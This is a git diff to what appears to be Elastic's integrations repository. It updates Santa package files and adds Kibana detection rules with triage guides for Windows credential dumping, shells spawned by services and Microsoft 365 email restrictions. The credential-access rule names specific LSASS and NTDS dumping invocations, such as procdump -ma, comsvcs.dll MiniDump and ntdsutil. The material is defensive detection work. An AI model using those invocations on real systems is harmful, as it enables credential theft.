359df8289bc..32380c45e0e 100644 --- a/packages/santa/_dev/deploy/docker/sample_logs/santa.log +++ b/packages/santa/_dev/deploy/docker/sample_logs/santa.log 
@@ -8,4 +8,4 @@ [2022-05-12T11:32:44.184Z] I santad: action=DISKAPPEAR|mount=/Volumes/GoogleDrive|volume=Google Drive|bsdname=|fs=smbfs|model=|serial=(null)|bus=|dmgpath=|appearance=2001-01-01T00:00:00.000Z [2022-05-12T11:33:57.166Z] I santad: action=DISKAPPEAR|mount=|volume=Install Google Drive|bsdname=disk4s2|fs=hfs|model=Apple Disk Image|serial=|bus=Virtual Interface|dmgpath=|appearance=2022-05-12T11:33:57.043Z [2022-05-12T11:33:57.235Z] I santad: action=DISKAPPEAR|mount=/Volumes/Install Google Drive|volume=Install Google Drive|bsdname=disk4s2|fs=hfs|model=Apple Disk Image|serial=|bus=Virtual Interface|dmgpath=|appearance=2022-05-12T11:33:57.043Z -[2022-05-12T11:35:31.436Z] I santad: action=DISKDISAPPEAR|mount=|volume=Install Google Drive|bsdname=disk4s2 \ No newline at end of file +[2022-05-12T11:35:31.436Z] I santad: action=DISKDISAPPEAR|mount=|volume=Install Google Drive|bsdname=disk4s2 diff --git a/packages/santa/changelog.yml b/packages/santa/changelog.yml index fa483336718..f70e6126a03 100644 --- a/packages/santa/changelog.yml +++ b/packages/santa/changelog.yml @@ -1,4 +1,9 @@ # newer versions go on top +- version: "3.17.0" + changes: + - description: Update manifest format version to v3.0.3. + type: enhancement + link: https://github.com/elastic/integrations/pull/9403 - version: "3.16.2" changes: - description: Changed owners diff --git a/packages/santa/data_stream/log/_dev/test/system/test-default-config.yml b/packages/santa/data_stream/log/_dev/test/system/test-default-config.yml index 25b18bc7ae8..177d8c1b1af 100644 --- a/packages/santa/data_stream/log/_dev/test/system/test-default-config.yml +++ b/packages/santa/data_stream/log/_dev/test/system/test-default-config.yml @@ -3,3 +3,5 @@ data_stream: vars: paths: - "{{SERVICE_LOGS_DIR}}/santa.log" +assert: + hit_count: 11 diff --git a/packages/santa/manifest.yml b/packages/santa/manifest.yml index d8a761aa449..242cda09914 100644 --- a/packages/santa/manifest.yml +++ b/packages/santa/manifest.yml 
@@ -1,13 +1,13 @@ name: santa title: Google Santa -version: "3.16.2" +version: "3.17.0" description: Collect logs from Google Santa with Elastic Agent. type: integration icons: - src: /img/icon.svg title: Google Santa type: image/svg+xml -format_version: "3.0.0" +format_version: "3.0.3" categories: - security conditions: diff --git a/packages/security_detection_engine/changelog.yml b/packages/security_detection_engine/changelog.yml index 8d04983a4c6..76f2ddcb157 100644 --- a/packages/security_detection_engine/changelog.yml +++ b/packages/security_detection_engine/changelog.yml 
@@ -1,5 +1,55 @@ # newer versions go on top # NOTE: please use pre-release versions (e.g. -beta.0) until a package is ready for production +- version: 8.13.3 + changes: + - description: Release security rules update + type: enhancement + link: https://github.com/elastic/integrations/pull/9507 +- version: 8.13.3-beta.1 + changes: + - description: Release security rules update + type: enhancement + link: https://github.com/elastic/integrations/pull/9497 +- version: 8.13.2 + changes: + - description: Release security rules update + type: enhancement + link: https://github.com/elastic/integrations/pull/9421 +- version: 8.13.2-beta.1 + changes: + - description: Release security rules update + type: enhancement + link: https://github.com/elastic/integrations/pulls/9412 +- version: 8.13.1 + changes: + - description: Release security rules update + type: enhancement + link: https://github.com/elastic/integrations/pull/9301 +- version: 8.13.1-beta.1 + changes: + - description: Release security rules update + type: enhancement + link: https://github.com/elastic/integrations/pull/9284 +- version: 8.12.5 + changes: + - description: Release security rules update + type: enhancement + link: https://github.com/elastic/integrations/pull/9218 +- version: 8.12.5-beta.1 + changes: + - description: Release security rules update + type: enhancement + link: https://github.com/elastic/integrations/pull/9207 +- version: 8.12.4 + changes: + - description: Release security rules update + type: enhancement + link: https://github.com/elastic/integrations/pull/9099 +- version: 8.12.4-beta.1 + changes: + - description: Release security rules update + type: enhancement + link: https://github.com/elastic/integrations/pull/9094 - version: 8.12.3 changes: - description: Release security rules update 
diff --git a/packages/security_detection_engine/kibana/security_rule/00140285-b827-4aee-aa09-8113f58a08f3_111.json b/packages/security_detection_engine/kibana/security_rule/00140285-b827-4aee-aa09-8113f58a08f3_111.json new file mode 100644 index 00000000000..0a8c97b3479 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/00140285-b827-4aee-aa09-8113f58a08f3_111.json 
@@ -0,0 +1,141 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies the execution of known Windows utilities often abused to dump LSASS memory or the Active Directory database (NTDS.dit) in preparation for credential access.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.*", + "logs-windows.*", + "endgame-*", + "logs-system.security*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Potential Credential Access via Windows Utilities", + "note": "## Triage and analysis\n\n### Investigating Potential Credential Access via Windows Utilities\n\nLocal Security Authority Server Service (LSASS) is a process in Microsoft Windows operating systems that is responsible for enforcing security policy on the system. It verifies users logging on to a Windows computer or server, handles password changes, and creates access tokens.\n\nThe `Ntds.dit` file is a database that stores Active Directory data, including information about user objects, groups, and group membership.\n\nThis rule looks for the execution of utilities that can extract credential data from the LSASS memory and Active Directory `Ntds.dit` file.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate abnormal behaviors observed by the subject process, such as network connections, registry or file modifications, and any spawned child processes.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Examine the command line to identify what information was targeted.\n- Identify the target computer and its role in the IT environment.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. 
Any activity that triggered the alert and is not inherently malicious must be monitored by the security team.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- If the host is a domain controller (DC):\n - Activate your incident response plan for total Active Directory compromise.\n - Review the privileges assigned to users that can access the DCs, to ensure that the least privilege principle is being followed and to reduce the attack surface.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n(\n (\n (?process.pe.original_file_name : \"procdump\" or process.name : \"procdump.exe\") and process.args : \"-ma\"\n ) or\n (\n process.name : \"ProcessDump.exe\" and not process.parent.executable regex~ \"\"\"C:\\\\Program Files( \\(x86\\))?\\\\Cisco Systems\\\\.*\"\"\"\n ) or\n (\n (?process.pe.original_file_name : \"WriteMiniDump.exe\" or process.name : \"WriteMiniDump.exe\") and\n not process.parent.executable regex~ \"\"\"C:\\\\Program Files( \\(x86\\))?\\\\Steam\\\\.*\"\"\"\n ) or\n (\n (?process.pe.original_file_name : \"RUNDLL32.EXE\" or process.name : \"RUNDLL32.exe\") and\n (process.args : \"MiniDump*\" or process.command_line : 
\"*comsvcs.dll*#24*\")\n ) or\n (\n (?process.pe.original_file_name : \"RdrLeakDiag.exe\" or process.name : \"RdrLeakDiag.exe\") and\n process.args : \"/fullmemdmp\"\n ) or\n (\n (?process.pe.original_file_name : \"SqlDumper.exe\" or process.name : \"SqlDumper.exe\") and\n process.args : \"0x01100*\") or\n (\n (?process.pe.original_file_name : \"TTTracer.exe\" or process.name : \"TTTracer.exe\") and\n process.args : \"-dumpFull\" and process.args : \"-attach\") or\n (\n (?process.pe.original_file_name : \"ntdsutil.exe\" or process.name : \"ntdsutil.exe\") and\n process.args : \"create*full*\") or\n (\n (?process.pe.original_file_name : \"diskshadow.exe\" or process.name : \"diskshadow.exe\") and process.args : \"/s\")\n)\n", + "references": [ + "https://lolbas-project.github.io/" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.command_line", + "type": "wildcard" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.executable", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.pe.original_file_name", + "type": "keyword" + } + ], + "risk_score": 73, + "rule_id": "00140285-b827-4aee-aa09-8113f58a08f3", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - 
https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "high", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Credential Access", + "Tactic: Defense Evasion", + "Resources: Investigation Guide", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0006", + "name": "Credential Access", + "reference": "https://attack.mitre.org/tactics/TA0006/" + }, + "technique": [ + { + "id": "T1003", + "name": "OS Credential Dumping", + "reference": "https://attack.mitre.org/techniques/T1003/", + "subtechnique": [ + { + "id": "T1003.001", + "name": "LSASS Memory", + "reference": "https://attack.mitre.org/techniques/T1003/001/" + }, + { + "id": "T1003.003", + "name": "NTDS", + "reference": "https://attack.mitre.org/techniques/T1003/003/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1218", + "name": "System Binary Proxy Execution", + "reference": "https://attack.mitre.org/techniques/T1218/", + "subtechnique": [ + { + "id": "T1218.011", + "name": "Rundll32", + "reference": "https://attack.mitre.org/techniques/T1218/011/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 111 + }, + "id": "00140285-b827-4aee-aa09-8113f58a08f3_111", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/00140285-b827-4aee-aa09-8113f58a08f3_112.json b/packages/security_detection_engine/kibana/security_rule/00140285-b827-4aee-aa09-8113f58a08f3_112.json new file mode 100644 index 00000000000..0a9f7b2cebc --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/00140285-b827-4aee-aa09-8113f58a08f3_112.json 
@@ -0,0 +1,141 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies the execution of known Windows utilities often abused to dump LSASS memory or the Active Directory database (NTDS.dit) in preparation for credential access.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.process-*", + "logs-windows.*", + "endgame-*", + "logs-system.security*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Potential Credential Access via Windows Utilities", + "note": "## Triage and analysis\n\n### Investigating Potential Credential Access via Windows Utilities\n\nLocal Security Authority Server Service (LSASS) is a process in Microsoft Windows operating systems that is responsible for enforcing security policy on the system. It verifies users logging on to a Windows computer or server, handles password changes, and creates access tokens.\n\nThe `Ntds.dit` file is a database that stores Active Directory data, including information about user objects, groups, and group membership.\n\nThis rule looks for the execution of utilities that can extract credential data from the LSASS memory and Active Directory `Ntds.dit` file.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate abnormal behaviors observed by the subject process, such as network connections, registry or file modifications, and any spawned child processes.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Examine the command line to identify what information was targeted.\n- Identify the target computer and its role in the IT environment.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. 
Any activity that triggered the alert and is not inherently malicious must be monitored by the security team.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- If the host is a domain controller (DC):\n - Activate your incident response plan for total Active Directory compromise.\n - Review the privileges assigned to users that can access the DCs, to ensure that the least privilege principle is being followed and to reduce the attack surface.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n(\n (\n (?process.pe.original_file_name : \"procdump\" or process.name : \"procdump.exe\") and process.args : \"-ma\"\n ) or\n (\n process.name : \"ProcessDump.exe\" and not process.parent.executable regex~ \"\"\"C:\\\\Program Files( \\(x86\\))?\\\\Cisco Systems\\\\.*\"\"\"\n ) or\n (\n (?process.pe.original_file_name : \"WriteMiniDump.exe\" or process.name : \"WriteMiniDump.exe\") and\n not process.parent.executable regex~ \"\"\"C:\\\\Program Files( \\(x86\\))?\\\\Steam\\\\.*\"\"\"\n ) or\n (\n (?process.pe.original_file_name : \"RUNDLL32.EXE\" or process.name : \"RUNDLL32.exe\") and\n (process.args : \"MiniDump*\" or process.command_line : 
\"*comsvcs.dll*#24*\")\n ) or\n (\n (?process.pe.original_file_name : \"RdrLeakDiag.exe\" or process.name : \"RdrLeakDiag.exe\") and\n process.args : \"/fullmemdmp\"\n ) or\n (\n (?process.pe.original_file_name : \"SqlDumper.exe\" or process.name : \"SqlDumper.exe\") and\n process.args : \"0x01100*\") or\n (\n (?process.pe.original_file_name : \"TTTracer.exe\" or process.name : \"TTTracer.exe\") and\n process.args : \"-dumpFull\" and process.args : \"-attach\") or\n (\n (?process.pe.original_file_name : \"ntdsutil.exe\" or process.name : \"ntdsutil.exe\") and\n process.args : \"create*full*\") or\n (\n (?process.pe.original_file_name : \"diskshadow.exe\" or process.name : \"diskshadow.exe\") and process.args : \"/s\")\n)\n", + "references": [ + "https://lolbas-project.github.io/" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.command_line", + "type": "wildcard" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.executable", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.pe.original_file_name", + "type": "keyword" + } + ], + "risk_score": 73, + "rule_id": "00140285-b827-4aee-aa09-8113f58a08f3", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - 
https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "high", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Credential Access", + "Tactic: Defense Evasion", + "Resources: Investigation Guide", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0006", + "name": "Credential Access", + "reference": "https://attack.mitre.org/tactics/TA0006/" + }, + "technique": [ + { + "id": "T1003", + "name": "OS Credential Dumping", + "reference": "https://attack.mitre.org/techniques/T1003/", + "subtechnique": [ + { + "id": "T1003.001", + "name": "LSASS Memory", + "reference": "https://attack.mitre.org/techniques/T1003/001/" + }, + { + "id": "T1003.003", + "name": "NTDS", + "reference": "https://attack.mitre.org/techniques/T1003/003/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1218", + "name": "System Binary Proxy Execution", + "reference": "https://attack.mitre.org/techniques/T1218/", + "subtechnique": [ + { + "id": "T1218.011", + "name": "Rundll32", + "reference": "https://attack.mitre.org/techniques/T1218/011/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 112 + }, + "id": "00140285-b827-4aee-aa09-8113f58a08f3_112", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/0022d47d-39c7-4f69-a232-4fe9dc7a3acd_110.json b/packages/security_detection_engine/kibana/security_rule/0022d47d-39c7-4f69-a232-4fe9dc7a3acd_110.json new file mode 100644 index 00000000000..4096fd43f26 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/0022d47d-39c7-4f69-a232-4fe9dc7a3acd_110.json 
@@ -0,0 +1,131 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Windows services typically run as SYSTEM and can be used as a privilege escalation opportunity. Malware or penetration testers may run a shell as a service to gain SYSTEM permissions.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.process-*", + "logs-windows.*", + "endgame-*", + "logs-system.security*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "System Shells via Services", + "note": "## Triage and analysis\n\n### Investigating System Shells via Services\n\nAttackers may configure existing services or create new ones to execute system shells to elevate their privileges from administrator to SYSTEM. They can also configure services to execute these shells with persistence payloads.\n\nThis rule looks for system shells being spawned by `services.exe`, which is compatible with the above behavior.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Identify how the service was created or modified. 
Look for registry changes events or Windows events related to service activities (for example, 4697 and/or 7045).\n - Examine the created and existent services, the executables or drivers referenced, and command line arguments for suspicious entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the referenced files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Contact the account owner and confirm whether they are aware of this activity.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Check for commands executed under the spawned shell.\n\n### False positive analysis\n\n- This activity should not happen legitimately. 
The security team should address any potential benign true positive (B-TP), as this configuration can put the user and the domain at risk.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Delete the service or restore it to the original configuration.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n process.parent.name : \"services.exe\" and\n process.name : (\"cmd.exe\", \"powershell.exe\", \"pwsh.exe\", \"powershell_ise.exe\") and\n\n /* Third party FP's */\n not process.args : \"NVDisplay.ContainerLocalSystem\"\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + }, + { + "package": "system", + "version": "^1.6.4" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": 
"0022d47d-39c7-4f69-a232-4fe9dc7a3acd", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Tactic: Execution", + "Resources: Investigation Guide", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [ + { + "id": "T1543", + "name": "Create or Modify System Process", + "reference": "https://attack.mitre.org/techniques/T1543/", + "subtechnique": [ + { + "id": "T1543.003", + "name": "Windows Service", + "reference": "https://attack.mitre.org/techniques/T1543/003/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1059", + "name": "Command and Scripting Interpreter", + "reference": "https://attack.mitre.org/techniques/T1059/", + "subtechnique": [ + { + "id": "T1059.001", + "name": "PowerShell", + "reference": "https://attack.mitre.org/techniques/T1059/001/" + }, + { + "id": "T1059.003", + "name": "Windows Command Shell", + "reference": "https://attack.mitre.org/techniques/T1059/003/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 110 + }, + "id": "0022d47d-39c7-4f69-a232-4fe9dc7a3acd_110", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/0136b315-b566-482f-866c-1d8e2477ba16_103.json b/packages/security_detection_engine/kibana/security_rule/0136b315-b566-482f-866c-1d8e2477ba16_103.json new file mode 100644 index 00000000000..2d78d99c09e --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/0136b315-b566-482f-866c-1d8e2477ba16_103.json 
@@ -0,0 +1,90 @@ +{ + "attributes": { + "author": [ + "Austin Songer" + ], + "description": "Identifies when a user has been restricted from sending email due to exceeding sending limits of the service policies per the Security Compliance Center.", + "false_positives": [ + "A user sending emails using personal distribution folders may trigger the event." + ], + "from": "now-30m", + "index": [ + "filebeat-*", + "logs-o365*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "Microsoft 365 User Restricted from Sending Email", + "note": "", + "query": "event.dataset:o365.audit and event.provider:SecurityComplianceCenter and event.category:web and event.action:\"User restricted from sending email\" and event.outcome:success\n", + "references": [ + "https://docs.microsoft.com/en-us/cloud-app-security/anomaly-detection-policy", + "https://docs.microsoft.com/en-us/cloud-app-security/policy-template-reference" + ], + "related_integrations": [ + { + "package": "o365", + "version": "^2.0.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.outcome", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.provider", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "0136b315-b566-482f-866c-1d8e2477ba16", + "setup": "The Office 365 Logs Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", + "severity": "medium", + "tags": [ + "Domain: Cloud", + "Data Source: Microsoft 365", + "Use Case: Configuration Audit", + "Tactic: Initial Access" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0001", + "name": "Initial Access", + "reference": "https://attack.mitre.org/tactics/TA0001/" + }, + "technique": [ + { + "id": "T1078", + 
"name": "Valid Accounts", + "reference": "https://attack.mitre.org/techniques/T1078/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "query", + "version": 103 + }, + "id": "0136b315-b566-482f-866c-1d8e2477ba16_103", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/0136b315-b566-482f-866c-1d8e2477ba16_105.json b/packages/security_detection_engine/kibana/security_rule/0136b315-b566-482f-866c-1d8e2477ba16_105.json new file mode 100644 index 00000000000..2c2df5b5bfe --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/0136b315-b566-482f-866c-1d8e2477ba16_105.json 
@@ -0,0 +1,90 @@ +{ + "attributes": { + "author": [ + "Austin Songer" + ], + "description": "Identifies when a user has been restricted from sending email due to exceeding sending limits of the service policies per the Security Compliance Center.", + "false_positives": [ + "A user sending emails using personal distribution folders may trigger the event." + ], + "from": "now-30m", + "index": [ + "filebeat-*", + "logs-o365*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "Microsoft 365 User Restricted from Sending Email", + "note": "", + "query": "event.dataset:o365.audit and event.provider:SecurityComplianceCenter and event.category:web and event.action:\"User restricted from sending email\" and event.outcome:success\n", + "references": [ + "https://docs.microsoft.com/en-us/cloud-app-security/anomaly-detection-policy", + "https://docs.microsoft.com/en-us/cloud-app-security/policy-template-reference" + ], + "related_integrations": [ + { + "package": "o365", + "version": "^2.0.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.outcome", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.provider", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "0136b315-b566-482f-866c-1d8e2477ba16", + "setup": "The Office 365 Logs Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", + "severity": "medium", + "tags": [ + "Domain: Cloud", + "Data Source: Microsoft 365", + "Use Case: Configuration Audit", + "Tactic: Initial Access" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0001", + "name": "Initial Access", + "reference": "https://attack.mitre.org/tactics/TA0001/" + }, + "technique": [ + { + "id": "T1078", + 
"name": "Valid Accounts", + "reference": "https://attack.mitre.org/techniques/T1078/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "query", + "version": 105 + }, + "id": "0136b315-b566-482f-866c-1d8e2477ba16_105", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/0136b315-b566-482f-866c-1d8e2477ba16_206.json b/packages/security_detection_engine/kibana/security_rule/0136b315-b566-482f-866c-1d8e2477ba16_206.json new file mode 100644 index 00000000000..673e6919743 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/0136b315-b566-482f-866c-1d8e2477ba16_206.json 
@@ -0,0 +1,90 @@ +{ + "attributes": { + "author": [ + "Austin Songer" + ], + "description": "Identifies when a user has been restricted from sending email due to exceeding sending limits of the service policies per the Security Compliance Center.", + "false_positives": [ + "A user sending emails using personal distribution folders may trigger the event." + ], + "from": "now-30m", + "index": [ + "filebeat-*", + "logs-o365*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "Microsoft 365 User Restricted from Sending Email", + "note": "", + "query": "event.dataset:o365.audit and event.provider:SecurityComplianceCenter and event.category:web and event.action:\"User restricted from sending email\" and event.outcome:success\n", + "references": [ + "https://docs.microsoft.com/en-us/cloud-app-security/anomaly-detection-policy", + "https://docs.microsoft.com/en-us/cloud-app-security/policy-template-reference" + ], + "related_integrations": [ + { + "package": "o365", + "version": "^2.0.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.outcome", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.provider", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "0136b315-b566-482f-866c-1d8e2477ba16", + "setup": "The Office 365 Logs Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", + "severity": "medium", + "tags": [ + "Domain: Cloud", + "Data Source: Microsoft 365", + "Use Case: Configuration Audit", + "Tactic: Initial Access" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0001", + "name": "Initial Access", + "reference": "https://attack.mitre.org/tactics/TA0001/" + }, + "technique": [ + { + "id": "T1078", + 
